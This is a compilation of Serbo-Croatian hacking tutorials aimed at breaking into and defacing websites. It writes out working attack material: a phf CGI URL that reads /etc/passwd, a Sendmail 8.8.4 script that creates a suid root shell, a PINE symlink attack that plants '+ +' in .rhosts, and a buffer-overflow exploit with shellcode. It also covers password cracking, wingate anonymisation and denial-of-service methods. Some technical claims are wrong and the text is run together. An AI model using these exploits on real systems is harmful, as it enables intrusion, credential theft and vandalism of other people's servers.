8. ALT 255-------------------Da li ste ikada pozeleli da napravite direktorijum kojem skoro niko nemoze prici. Pa evo od ovoga trenutka mozete ispuniti svoju zelju.Idite u Dos prompt i dodjite u ROOT direktorijum, tj. otkucajte CD\ ionda lepo otkucajte MD (ALT + 255). Znaci otkucajte MD pa SPACE paonda drzite ALT i otkucajte 255 na desnoj strani tastature i zatimpustite ALT i pritisnite Enter.I onda lepo napisete CD i opet stisneteALT i otkucate 255 na desnoj strani i pustite ALT i enter. Sada mozeteu taj direktorijum stavljati sta god pozelite i ne moze vam tu nikopristupiti sem nekih malo pametnijih. Ovo svakako isprobajte.Zaboravih da kazem, ako zelite da obrisete taj direktorijum ukucajteRD ili RMDIR pa onda SPACE pa drzite ALT pa otkucajte 255 i ondapustite ALT i pritisnite ENTER.Najbolja fora koju ja koristim jeste danapravite direktorijum po sledecem postupku: otkucajte MD pa ondapritisnite ALT i otkucajte 255 i onda pustite ALT i u nastavku otkucajtenesto proizvoljno npr. backspace i onda ce vam se stvoriti zasticenidrektorijum koji se zove backspace.Ovo je jedna od nesuglasnicaDOSa i WINDOWSa. Ovo se desava zato sto je kod ALT+255 ustvariNULL to jest praznina i Windows to ne moze da gleda kao znak izato ne moze da pristupi tom direktorijumu. Ovo je isprobano i nijedanprogram iz Windowsanije uspeo da pristupi tom direktorijumu, dok nadrugoj strani skoro svi programi za dos uspeli su da pristupe tomdirektorijumu i chak da ga obrishu.

WEB HACK

_-SADRZAJ-_

-Objasnjenje-Kad ovo procitas...

-Sta je potrebno-Kako ostati anoniman?

-Shell Account...?-Malo osnovnih Unix komandi-Nalazenje informacija o siteu

-Iskoristiti rupu-Ostalo

_-OBASNJENJE-_

-Ovaj tutorial sam napisao jer mi je dokurrcilo da me svako pita ovakvestvari "Molim te mi reci kako da unistim ovaj site!","Ajde plz. imamsamo X godina" ili "Ajde molim te unisti ovaj site,jako me nervira

webmaster".-E sad,sto se tice flame-a,mozete zaboraviiti na to,jer ja znam koliko je

ovo lame,inapisao sam samo da bi me ostavili na miru.I znam da je ovaj tutorial

los,i da ne bitrebao da postoji,ali boli me kurac.Vec mi je dosadilo da me 1000 ljudi

pita istu stvar,odsad cu samo da dam link do ovog tutoriala.ZATO postoji ovo.

-Ja ne odgovaram za ono sto radite posle ccitanja ovog tutoriala,ovajtutorial samo govori kako se to radi,ne savetujem vam da to radite.

_-KAD OVO PROCITAS-_

-Kad procitas ovaj tutorial NISI HAKER!!! To treba da bude kristalno jasno.I nemoj da ides po

forumima i da se kurcis kako si haker jer si deface-ovao neku glupu stranicu.Necu da objasnjavam

kako postati haker...ima tona tutoriala o tome.I apelujem na vas da |\|3p|5373 0\/4K0 .

_-STA JE POTREBNO-_

E,za ovaj tutorial nije potrebno imati unix.Mislim,bilo bi mnogo bolje da imas unix,ali znam da

te mrzi da instaliras... Sve u svemu potrebno je par wingate adresa i shell account.Bez brige,

objasnicu sta je sta.Posto i oko ovog ima tona tutoriala,necu zalaziti u

detalje.Uglavnom,wingate je adresa na kojojse nalazi programcic koji je veoma slican proxy-u.Postoji mnogo lose

konfigurisanih wingate-a ito se moze iskoristiti kako bi se postigla neka

anonimnost.Anonimnostcete postici tako sto cetese povezati preko telnet klijenta.Kasnije o tome.Shell account...sad cu

jako da pojednostavim.To je kao racun na nekom kompjuteru koji sluzi da biste mogli da

koristite taj kompjuter sanjegovim uslugama,ali sa odredjenim privilegijama.Ako ovo nije

jasno,onda procitaj recenicujos jedno 10 puta,ako ni onda nije jasno,idi u kuhinju,nadji ogroman noz

i ubi se ko siroce.I trebace jedan port scanner.To je program koji gleda otvorene portove

na nekom racunaru.Portovi su kao vrata preko kojih se povezes na neki racunar i koristis

usluge.Ako je na primerotvoren port pod brojem 21,onda to znaci da taj racunar ima FTP

deamon,to je program kojipruza usluge FTP-a (File transfer protocol). To je ono sto vam treba.

_-KAKO OSTATI ANONIMAN-_

Pa..ne mozes ostati potpuno anoniman.Ali moze se ostati dosta anoniman (mogu misliti kako je

ovo bilo gramaticki tacno,moj fond reci nije ogromoan,tako da se izvinjavam).Ja cu reci kako se

moze ostati anoniman preko wingate-a.Postoje mnogi site-ovi na kojima se moze naci lista

wingate-a, a jedan od takvih site-ova je www.cyberarmy.com/listsTamo izaberete wingate,i ima jako puno adresa i portova (pricao sam o

portovima).Recimo da imaneka ovakva adresa: 213.43.22.11 (lupio sam adresu) koja je na portu

1080.Treba uraditisledece:

Pokrenete telnet.To radite tako sto idete na Start,pa Run,i onda upisete telnet.Pojavice vam se

jedan program,koji bas i nije prelepog dizajna,ali to nije ni vazno.Idete na Connect i ondaRemote System.

Posle toga u Hostname ukucate adresu na kojoj smo rekli da je

Wingate,u ovom slucaju213.43.22.11 .U polje port upisite 1080 (to sam rekao da Wingate na toj

adresi radi na tom portu).Termtype treba da bude vt100.

I onda pritisnete connect.Sacekate malo i povezace se.Posle toga se telnetujete na svoj shell

account tako sto upisete nekaadresa.com 23(23 je telnet port).U mesto 23 mozete da upisete i recimo 21,tako cete

se konektovati na FTPprotokol.Sad ste koliko toliko anonimni.Savetujem da linkujete par

wingate-a.To cete tako raditisto cete se umesto da se telnetujete na shell-account,telnetovati na

adresu drugog wingate-a itako redom dok vam ne ponestane wingate adresa i onda se konektujete

na shell account.

_-SHELL ACCOUNT-_

Unix je visekorisnicki sistem.To znaci da vise korisnika moze da koristi isti operativni sistem.

Postoje servisi koji besplatno daju racune na svoj sistem.Jedan od ovih je npr. luxadmin.org .

Kada dobijete racun ovde moci cete da koristite unix,medjutim sa ogranicenjima.Imacete racun sa

smanjenim privilegijama i dobicete oko 50 MB u najboljem slucaju.I bice dosta.Znaci idite na

luxadmin.org i uzmite jedan shell account.Dobicete svoj username i password.Sada se treba

telnetovati na taj shellaccount kako bi ga uopste mogli koristiti.Znaci prvo telnet na wingate

i onda....vec sam pisao o tome.E,kad se telnetujete dobicete prompt za login.Tu ukucate svoj username

i zatim password.Necetevideti dok kucate password zbog zastite.Kada se ulogujete usli ste u svoj

shell account.

_-MALO OSNOVNIH UNIX KOMANDI-_

Savetujem da kupite neku Unix/Linux knjigu i malo proucite.Vredece.E sad.Da biste videli u kojem se nalazite direktorijumu ukucate ovu

komandu: pwd .Da bistevideli koje fileove imate u direktorijumu ukucajte ovo: ls -al (ovim cete

videti iprivilegije....necu o tome).

Da biste mogli da se krecete kroz direktorijume koristite ove komande:cd direktorijum (ovim odlazite u zeljeni direktorijum) ,cd .. (izlazite iz

direktorijuma).Dabiste obrisali neki file koristite ovu komandu:

rm file. Ako ocete da obrisete sve u direktorijumu ukucajte ovo: rm *.*

_-NALAZENJE INFORMACIJA O SITE-U-_

Ovo je najvaznija faza kod upadanja u neki site.Postoji vise nacina i stvari koji se trebaju

otkriti.Treba otkriti Operativni sistem,otvorene portove, deamone i verzije koji rade na serveru.

--Operativni sistem-Objasnicu 2 nacina.Prvi je da se telnetujjete na server ako ima otvoren

telnet port 23.Tamo pisekoji je Operativni Sistem.

-Drugi nacin je netcraft.comIdite na taj site i kliknite na link na kojem pise "Whats that site running"

ili tako nesto.Idite na taj link i upisite site koji vas zanima.

Tamo ce pisati sta taj site ima.Postoji jos nacina,kao sto je nmap ....ali bice ovo dosta za vas.

Zatim skenirajte otvorene portove sa port scannerom.Telnetujte se na svaki port i pogledajte sta pise,koja je verzija

programa,ime....SVE ZAPISITE.E,kad sve to zavrsite imate dosta informacija o site-u da biste mogli

iskorisiti.

_-ISKORISTITI RUPU-_

E sad.Postoje stvari koje se zovu exploiti.To su programi koji iskoriste rupu u programu.Sa ovim

exploitima moguce je dobiti root na nekom serveru (root je svemocni user,ima sve privilegije).

Postoji vise vrsta exploita.Kao sto su Remote (ovo cemo mi koristiti) ,Local i DoS.

Mi cemo koristiti remote.Exploiti su 95% pisani u C-u,a ponekad i u PERL-u.E sad...posto vec

imamo informacije o site-u ostaje nam da nadjemo exploit i udjemo u server.Postoje site-ovigde se oni mogu naci.

Dva najpoznatija i najbolja site-a su http://packetstorm.securify.com i http://www.hack.co.za

Tamo nadjite exploit za ono sto ste zapisali.Vazne su verzije programa!E sad kada ste skinuli exploit i stavili ga na shell account preostaje samo

kompajlirati exploiti pokrenuti ga.

--Ako je exploit napisam u C-u onda treba uraditi ovo:

gcc file.c -o fileSada imate kompajliran exploit.Mozete ga pokrenuti sa:

file ili ./fileSada ce da vam ispise usage.Ako pise recimo: Usage <site> <port>

onda cete ovako startovati exploit:./file www.nekisite.com 21

Malo sacekate i usli ste.Sada samo koristite ono sto sam vam pokazao u sekciji o unix komandama.

--Ako je napisan u PERL-uAko je napisan u PERL-u nema potrebe za kompajliranjem,jer je PERL

interpretiran jezik(ako ne znate nista o programiranju...onda ni ovo ne znate).Znaci samo

startujete sa:perl file.pl

Onda ce vam opet ispisati Usage,i opet ista prica.

*-*-*-*-*--- Hacking Web-site --*-*-*-*-*-*-*-*-*-*-*

* Mnogo ljudi me je pitalo kako hacknuti web stranicu (neki sumalo pretjerali pa su pitali kako hacknut Altavista.com, Yahoo, Hotmail

itd.. a ako i vi tako nesto zelite onda se kanite compa nije to za vas,slupajte ga popijte mu krv radite sta hocete).

Naime, kada ovaj text procitate niste hacker jer haker nemozetetako lahko postat i nemoj da se ku*cite kako ste nesto hacknuli samosto ste procitali text. Ovaj tutorial je napisan da vam pojasni i nauci

a ne da vi procitate i onda se ku*cite da ste hacker.Manje price i krenimo.

Sada kada ste skontali vasu metu (nadam se da nije Yahoo a ako jest znate sta cete :))

onda mozemo krenut.

1. FazaSajt koji zelite da hacknete, prvo morate

saznat na kojem je serveru i koji je Operativni system.Logicno je ako je server IIS Microsoft da ce biti operativni system

Win a ne Linux ili nesto drugo. Prvo naucite te vrste servera i operativnih systema.

Kako to saznat?Ima milion programa sto to rade a neki od njih su NMAP, Queso itd...Da vi sad ne bih skidali (uuuh valja naci i skinuti programe :)) odite

na www.netcraft.com i lijepo fino upisite adresu web sajta kojeg zelite hacknut.

Onda cete dobit sta vam treba. Kada ste to vidjeli, znate sta da radite.Ako je server Apache i OS Linux, nemojte se previse nadat da cete

hacknutjer Linux je ako nista sigurniji od Windowsa. Naravno ima exploita

i na njemu ali to vama prepustam da sami nadjete exploite nanekim hack sajtovima. E ako je IIS Microfost server i to verzija 4.0

onda je to druga prica. Zaista ima hrpa exploita za taj serveri ja znam neke medjutim imajte u vidu da je administrator mozdazakrpio te rupe. Ova faza je samo uvod, da vidite kakve su to vrste

serverai OS.

2.FazaE ako se opredjelite za 1. fazu, onda ovu drugu nemojte ni citat.

Ako se opredjelite za 1. fazu, onda cete trebat trazit exploiteza server na kojem je ta vasa stranica koju trebate

hacnkut. To je i dug proces ali ako se razumijete i znatesta su exploiti i malo oko njih, onda vam nece biti tesko naci.

E glavna metoda za 1. fazu jeste da skenirate taj server.Medjuti to je samo jedan dio posla, ali tu vam je dosta toga uradjeno.

Naime, kada skenirate server, onda mozete vidjeti koji exploitipostoje na njemu! I to je to. Nadjete exploit taj i taj i

isprobate ga. Sad bi vi rekli "E jebote lahko je reci da treba skenirat,al kako?". Fino, imate milion Exploit skenera, neke mozete skinuti i

na www.nhs-ac.cjb.net sajtu a preporucujem N-Stealth skener.Trazi ga na Astalavista.com

Da se mi vratimo drugoj fazi.Ovdje cak nemorate ni znat koji je server i koji je OS.

Sve sto trebate jeste da vidite koji su portovi otvoreni natom serveru. Lijepo fino uzmite port skener i skenirajte host

ako to neznate nemojte ni citat dalje ovaj tutorial, jednostavno gaizbriste. IP adresu takodjer mozete doznat na stranici www.netcraft.com

E postoji jedna dobro poznata metoda. Naime, ako je otvorenport 21 tj. FTP i ako se mozete ulogovat kao anonimni korisnik, onda sve

sto trebate jeste da pogledate u direktorij /etc/passwd naravnoako je to dopusteno. Ako je dopusteno i ako uspijte doci do togaposao je zavrsen, znate sta trebate dalje :)) Medjutim ako to nije

moguceako se nemozete ulogovat ili nesto drugo, pogledajte koji

su portovi otvoreni kada skenirate. Sada morate znati malo oprotokolima a imate neke tutore o tome na www.nhs-ac.cjb.net sajtu.

Takodjer bitno je doci do administratorske stranice a ona je obicnona portu 6075. Naravno trebate naci tu stranicu i port, probajte jos

sa: 65534, 6073, 1260, 5555, 1234 itd...Ako nadjete taj port, u vas browser upisite (primjer):

http://123.122.34.233:6075E da se mi vratimo FTP-u. Ako je taj port uopste otvoren onda

lijeo fino skinete wwwhack alat i izaberete FTP metodu. Program ceonda probat probit user i pass a uzimace rijeci iz rijecnika.

Preporucujem da izaberete metodu sve moguce kombinacije ali to ce

zaistadugo trajat. Bilo kako bilo, znate sta treba da radite, imate mnogo izbora

pa bujrum.

3. FazaOva faza je povezana sa drugom. Naime ako na stranici postoji

POP3 otvoren port, onda isto korstite wwwhack kao i kodFTP-a. Naravno program ce vas o svemu obavjestiti kada sta otkrije.

4. FazaU ovoj fazi vam ne treba nista samo program :))

Ovdje cemo korisit DoS napade. Ko nezna sta je to, nekaskine tutor o tome na nhs-ac sajtu i nauci to.

Medjutim sa ovom tehnikom mozete samo "oborit" server.Ipak, procitajte o tome u posebnom tutoru.

Hackanje Sifre putem ftp.

Pokazat cu vam laksi put kako uz ftp access preuzmete password i login name od neprijatelja.

Ali prvo naucite nesto o file passwordu Kako izgleda primjerroot:User:d7Bdg:1n2HG2:1127:20:Superuser

TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh

BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh

Ovako izgleda pravi password file koji ce vam dati root

root:x:0:1:Superuser:/:ftp:x:202:102:Anonymous ftp:/u1/ftp:

ftpadmin:x:203:102:ftp Administrator:/u1/ftp

Ovako bih izgledao drugi primjer poznatog sjena file

root:x:0:1:0000-Admin(0000):/:/usr/bin/cshdaemon:x:1:1:0000-Admin(0000):/:

bin:x:2:2:0000-Admin(0000):/usr/bin:sys:x:3:3:0000-Admin(0000):/:

adm:x:4:4:0000-Admin(0000):/var/adm:lp:x:71:8:0000-lp(0000):/usr/spool/lp:

smtp:x:0:0:mail daemon user:/:uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:

nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico

listen:x:37:4:Network Admin:/usr/net/nls:nobody:x:60001:60001:uid no body:/:

noaccess:x:60002:60002:uid no access:/:webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh

pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false

ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false

Sjena password ima "x" a ponekda moze biti*

Sada kad znate nesto malo o formaciji password formata

Sad mozemo govoriti kako crackati server

I vazno za napomentu da je postupak veoma lak. 1.Prvi korak jedownload i copiraj file. 2. Drugi korak je da nadjete dobar crack

programcic kao sto jeCracker Jack, John the

Ripper, Brute Force Cracker, or Jack the Ripper. Znaci cim startate program prvo sto ce da pita je password

Password file mozete napraviti tako sto ce te download vec gotove pakete sa neta ili ce te ga sloziti u formaciju(ASCII, caps,

lowercase, and numeric letters may also be added) . kad dobijete trazeni password sljedite direkcije crack-a

ovdje su vam serveri za pronalazak.....fileova

http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

dajem primjerda bih pw file za http://www.webpage.com/ treba da ukucas

http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

samo ih copiraj i plasiraj u crack

Telnet i Exploits

ako govorimo o exploits to je najlaksi nacin hackanja web straniceAli prije nego sto bih ti pokrenu exploit potrebno ti je

da imas telnet proggie,

samo skrecem paznju na bug i errors koji se javljaju koji ce vam stvoriti problema do root access.

root access.

poznati exploit Sendmail v.8.8.4It creates a suid program /tmp/x that calls shell as root. Ovako treba da

izgleda kad ga nastimate

cat << _EOF_ >/tmp/x.c#define RUN "/bin/ksh"

#include<stdio.h>main()

{execl(RUN,RUN,NULL);

}_EOF_

#cat << _EOF_ >/tmp/spawnfish.c

main(){

execl("/usr/lib/sendmail","/tmp/smtpd",0);}

_EOF_#

cat << _EOF_ >/tmp/smtpd.cmain()

{setuid(0); setgid(0);

system("chown root /tmp/x ;chmod 4755 /tmp/x");}

_EOF_##

gcc -O -o /tmp/x /tmp/x.cgcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c

gcc -O3 -o /tmp/smtpd /tmp/smtpd.c#

/tmp/spawnfishkill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]

*"// |cut -d" " -f1`rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd

/tmp/x.csleep 5

if [ -u /tmp/x ] ; thenecho "leet..."

/tmp/xfi

Ovo je pine exploit namjenjen za linux potrebu

Creating a symbolic link from /tmp/.hamors_lockfile to

~hamors/.rhosts(for a genericexample) will cause PINE to create ~hamors/.rhosts as a 666 file with

PINE's process idas its contents. One may now simply do an echo "+ +" >

/tmp/.hamors_lockfile, then rm/tmp/.hamors_lockfile.

hamors (21 19:04) litterbox:~> pine

catluvr (6 19:06) litterbox:~> ps -aux | grep pinecatluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine

hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine

catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors- -rw-rw-rw- 1 hamors elite 4 Aug 26 19:055 .302.f5a4

catluvr (8 19:07) litterbox:~> ps -aux | grep pinecatluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine

catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4

hamors (23 19:09) litterbox:~> pine

catluvr (11 19:10) litterbox:~> ps -aux | grep pinecatluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine

hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine

catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4

catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4+ +

catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4

catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors

da vas nebih zbunilo ovo nije FreeBSDFreeBSD-SA-96:15. Ovako bih trebalo da izgleda kad nastimate

#include <stdio.h>#include <stdlib.h>#include <unistd.h>

#define BUFFER_SIZE 156 /* velicina bufer-a */

#define OFFSET -290 /broj bufera kad ga pokrenete */

long get_esp(void) { __asm__("movl %esp,%eax\n"); }

main(int argc, char *argv[]){

char *buf = NULL;unsigned long *addr_ptr = NULL;

char *ptr = NULL;char execshell[] =

"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */

"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */

"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */

"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57 total */

int i,j;

buf = malloc(4096);

/* puno startanje bufera sa nops */

i = BUFFER_SIZE-strlen(execshell);

memset(buf, 0x90, i);ptr = buf + i;

/* ubaci exploit code u bufer */

for(i = 0; i < strlen(execshell); i++)*ptr++ = execshell[i];

addr_ptr = (long *)ptr;for(i=0;i < (104/4); i++)

*addr_ptr++ = get_esp() + OFFSET;

ptr = (char *)addr_ptr;*ptr = 0;

setenv("HOME", buf, 1);

execl("/usr/sbin/ppp", "ppp", NULL);}

*-*-*-*--- Komande u MS-DOS ---*-*-*-*

* MS-DOS. Mislim da nema potrebe da objasnjavam sta je toa ko nezna neka odmah izbrise ovaj tutorial jer to nije za njega :))

Posto ja jako volim DOS morao sam napisat nesto o njemu :))Naime u ovom tutoru cete nauciti osnovne MS-DOS komande i malo

objasnjenje.

* Komande

* CD - Sluzi da se pozicionirate na odredjeni direktorijPrimjer: c:\> cd garnet

* COPY - Sluzi da kopiranje fajlovaPrimjer: c:\> copy c:*.* a: -kopira cijeli sadrzaj sa C: na disketu A:

Primjer: c:\> copy c:garnet.exe a: -kopira fajl garnet.exe na A:Primjer: c:\> copy c:\windows\garnet.exe c:\dos -kopira fajl garnet.exe

u DOS direktorijPrimjer: c:\> copy a:*.* c: -kopira cijeli sadrzaj sa diskete na C:

* DEL - Brisanje fajlovaPrimjer: c:\> del *.* -brise sve fajlove na C:

Primjer: c:\> del garnet.exe -brise fajl garnet.exePrimjer: c:\> del *.exe -brise sve datoteke EXE na C:

* DIR -Izlistava fajlove i direktorijePrimjer: c:\> dir -izlistava fajlove i direktoje na C:

Primjer: c:\> dir/p -izlistava postepeno fajlove i direktorijePrimjer: c:\> dir/w -izlistava fajlove i direktorije u drugom formatuPrimjer: c:\> dir/s -izlistava sve direktoje i fajlove na cijelome hard

disku

* MK (MKDIR) - Kreiranje direktorijaPrimjer: c:\> mk garnet -kreira direktorij garnet

* RM (RMDIR)Primjer: c:\> rm garnet -brise direktorij garnet

* COPY CON - Kreiranje fajlaPrimjer: c:\> copy con garnet.txt -Kreira fajl garnet.exe

(kada unesete komandu i pritisnete ENTER, unesite text u taj fajli kad zavrsite pritisnite tipku F6 i snimicete text koji ste unijeli u taj

fajl)

* REM - KomentarPrimjer: c:\> rem garnet i nhs-ac.cjb.net -nista posebno :))

* PAUSE - PauzaPrimjer: c:\> pause -za daljni radi pritisnite ENTER

* DATE - Ispis datumaPrimjer: c:\> date

* TIME - Ispis vremenaPrimjer: c:\> time

* TYPE - Ispis sadrzaja fajlaPrimjer: c:\> type garnet.txt -ispisuje sadrzaj fajla garnet.txt

* ATTRIB - Zastita fajlovaPrimjer: c:\> attrib garnet.exe +h -sakriva fajl garnet.exe "Hiden"

Primjer: c:\> attrib garnet.exe +r -zasticuje garnet.exe od editovanja "Read only"

(Ako zelite odkljucati fajl, onda umjesto "+", stavite "-")

* ECHO - Ispis tekstaPrimjer: c:\> echo on -pokazuje tekstPrimjer: c:\> echo off -sakriva tekst

* /? - Help(Za svaku ovu komandu mozete upisat /? i dobit cete

pomoc za tu komandu)Primjer: c:\> attrib /?

Sta su to DoS napadi i vrste DoS napada

* U ovom slucaju rijec DoS neznaci onaj Microsoft MS-DOS, ova skracenica znaci:

"Denial of Service". Glavni cilj ovih napada jeste da "uguse" konekciju i time

obore odredjenu masinu. Kako to rade, ima mnogo nacina ali glavni cilj je

onemoguciti funkciju odredjene masine, jednostavno onesposobiti je.Sve u svemu tehnika ovih napada jeste da se sto vise paketa posalje na

odredjenumasinu i time onesposobi. To se vrsi na mnogo nacina koje cete nauciti u

sljedecimtekstovima. Samo da napomenem da niste haker ako koristite neke

nukkere kojirade na ovom principu i hvalite se kako ste nekoga nukovali. Ako nesto

zelite nauciti pakasnije to odraditi, onda prvo morate shvatiti pa tek onda nesto uradit iz

toga stonaucite. Zato prvo shvatite funkciju i "gradju" nukkera pa tek onda

"uzmite u ruke".

Problem je u tome sto se veoma tesko moze zastitit od ovih vrsta napada jer se

jednostavno koriste normnalne systemske komande.Evo vam sad vrste DoS napada i malo objasnjenje za svaku.

* LandOvdje se radi o takvom napadu sto salje na otvoreni port SYN paket koji

mozeda system obori.

* Smurf-napadi

Ovdje se salje sto vise pingova da bi se dobio sto veci broj odgovora i tako

bi srusio system zrtve. Za 100 pingova dobija se 1000 odgovora.

* OOB-napadi

* Kao i sto svi znate ovaj napad je najpoznatiji a i najednostavniji. Medjutim radi samo

na Win 95 dok je Win 98 zasticen od ovog napada. Njegova funkcija je u tome sto

salje neke bezvezne znakove na odredjenu masinu i dovodi do Blue screen of death

(ako neznate sta je Blue screnn of death, mozete procitat u ovom tutorialu)

* SYN flood

* Jedna TCP konekcija između dva sistema ostvaruje se preko tkz. "three-way-handshake".

1) Sistem A---->Sistem B : SYN ("Hoću vezu s tobom")2) Sistem B---->Sistem A : ACK/SYN ("Dobro uzeo sam to uobzir)

3) Sistem A---->Sistem B : ACK ("Dobro,ja se također slažem")

Sad se jednostavno u jednom SYN paketu daje pogrešna adresa (jedna koja i nepostoji),

i time ne dolazi na sisitem B- paketa odgovor (ACK), jer i nepostoji adresa.

Ali sistem B čeka još određeno vrijeme na odgovo, sve dok ne dođe "connection timeout".

U tom vremenu se mora sistem B sa što više ping-ova prenapuniti. Posljedica je da se

sisitem B prenapuni, tako da za određeno vrijeme više ni na jedan SYN-paket odgovori.

* Ping of Death

* Za ovaj napad sluzi obicna komanda koja glasi: "ping adresa -n 9999999"

Kada se posalje ova naredba na odredjeni server, onda on pocinje da obradjuje, ali

posto se poslalo oko milion pingova, onda server sporo obradjuje i jednostavno se

srusi, dolazi do Buffer Overflow.Medjutim za ove napade je davno izasao patch i nevazi na jacim

serverima.(Nemoze te koristit ovaj napad sa slabijim mashinama)

* To bi bilo to, jos samo da napomenen ono sto sam rekao na pocetku a to je da

se veoma tesko zastitit od ovakvih napada. Zato nabavite zastitu da vas lameri

neuznemiravaju bezze :))

*-*-*-*--- Programi u MS-DOS-u --*-*-*-*

* MS-DOS. Mislim da nema potrebe da objasnjavam sta je toa ko nezna neka odmah izbrise ovaj tutorial jer to nije za njega :))

Posto ja jako volim DOS morao sam napisat nesto o njemu :))E sigurno znate ako nista barem osnovne komande u MS-DOS-u a ucili

ste ihi u osnovnoj skoli. (cd.. copy,del,rd itd...)

Medjutim MS-DOS sadrzi mnogo programa a nekih od njih su glavni hakerski

alati. Ti programi su legalne vrste medjutim haker ih koriste zarazna ispitivanja i pronalazenja informacija o nekoj zrtvi.

U ovom tutorialu cu opisat par programa i otkriti njihove male tajne.

* Program NET

Ovo je svima poznat program u MS-DOS-u.Ove programe sve mozete naci u C:\Windows

Medjutim ako imate Win98 postoji mogucnost da se ti programi ne nalaze tu.

Znaci ako imate Win98 pogledajte u Windows direktorij Zip fajlove:Net7.zip, Net8.zip, Net9.zip i Net10.zip. U nekim tim arhivama naci cete

i ostale programe pored programa NET.Program NET ima mnogo funkcija. Preko njega mozete da ulazite

u direktorij na drugim racunarima naravno ako je to dozvoljeno ali sadje to druga prica.

Evo vam objasnjenje za komande u NET:

NET CONFIG Displays your current workgroup settings.NET DIAG Runs the Microsoft Network Diagnostics program to

display diagnostic information about your network.NET HELP Provides information about commands and

error messages.NET INIT Loads protocol and network-adapter drivers without

binding them to Protocol Manager.NET LOGOFF Breaks the connection between your computer and

the shared resources to which it is connected.NET LOGON Identifies you as a member of a workgroup.

NET PASSWORD Changes your logon password.

NET PRINT Displays information about print queuesand controls print jobs.

NET START Starts services.NET STOP Stops services.

NET TIME Displays the time on or synchronizes your computer'sclock with the clock on a Microsoft Windows for

Workgroups, Windows NT, Windows 95, or NetWare time server.NET USE Connects to or disconnects from a shared

resource or displays information aboutconnections.

NET VER Displays the type and version number of theworkgroup redirector you are using.

NET VIEW Displays a list of computers that shareresources or a list of shared resources

on a specific computer.

* Program NBTSTAT

Ovaj program vam takodjer ima mnogo opcija.Pomocu njega mozete da vidite da li je na nekom racunaru

otvoren port 139 NetBIOS.To mozete uraditi ovako:

c:\> nbtstat -A 195.222.45.22

Evo vam i help sa prevodom za NBTSTAT:

Nbtstat [-a remoteime] [-A ip adresa] [-c] [-n] [-R] [-r] [-S][-s]

Switchevi : -a Izlista imena remote kompjutera po tabeli zadanoj za hostime.

-A Izlista imena remote kompjutera po tabeeli zadanoj poip adresama

-c Izlista remote ime cache ukljucujuci ipp adresu.-n Izlista lokalna NetBIOS imena

-r Izlista imena dobijna emitirane putem WWINS-R Uzima i realod remote cache tabelu....<

-S Izlista sessione tabele sa destinacijomm IPadresama

-s Izlista sessione tabele konverzije...

* Ping

Ovu komandu dobro znate.Pomocu nje doznajete da li neka IP adresa postoji na internetu.

Npr: c:\> ping 195.222.45.22

* u MS-DOS-u programa ima zaista puno ali ja sam opisao samo 3, barem su

ova osnovna. Za svaki ovaj program upisite /? ako zelite dobiti kratki

help.Npr: C:\> ping /?

Uvod u Svijet Cracking-a

Uvod:Sta je Cracking?

Cracking je jedna vrsta expresije.Ako hoces crack-ovati mozes uvidjeti da nije lako

razumijeti ispocetka neke osnovne tocke crackinga ali nakon sto ih razumis imaces potrebno znanje i iskustvo za daljnje usavrsavanje

crackinga.Ovaj text ce objasniti neke osnovne tacke crackinga,nadam se da cete

razumijeti nacin na koji cu neke tacke objasniti.

Korak 1:Ovaj text je napravljen za sve pocetnike na netu koji nerazumiju ili

neznaju nistao ASM-Codu ili o internalnoj funkciji aplikacije.

Potrebni Software:Za pocetak jedino sto ce nam trebati je W32Dasm8.9 (Windows

disassembler) i HIEW (to je jedan od boljih Hex-Editora mislim da je najbolji za pocetak).To je sve za pocetak.

Sad malo znanja:Kao sto mozda znate nije lako rukovati sa svim tim asm-codovima i

mislim da mnogi neznaju puno o njima,tako da cu obajsniti najpotrebnije komande.

Moramo znati da svaka dva broja u asm-codu predstavljaju jedan bajt (byte).

Broj 73536357 =4 bajta (bytes).75 je jedan bajt (byte) 43 je jedan bajt i 45 je jedan bajt.Sad imamo 4bajta.Ako zelimo da ih promjenimo kasnije

znamo da trebamo promijeniti uvijek dva brooja sa dva druga broja.Sad par stvari o brojevima koje ces vidjeti kada disassemble exe. fajl.

je (hexadecimala je 74) = jump if equal (skoci ako je jednak)jne (hexadecimala je 75) = jump if not equal (skoci ako nije jednak)

nop (hexadecimala je 90) =no operation (nema operacija)call (nema hexadecimale) = call a operation (poziva operaciju)

jmp (nema hexadecimale) = jump to string/operation (skok na operciju)

Ovih pet stvari ce nam trebati za pocetak.Ok sad cemo pogledati sta oni zapravo rade u asm-codu.

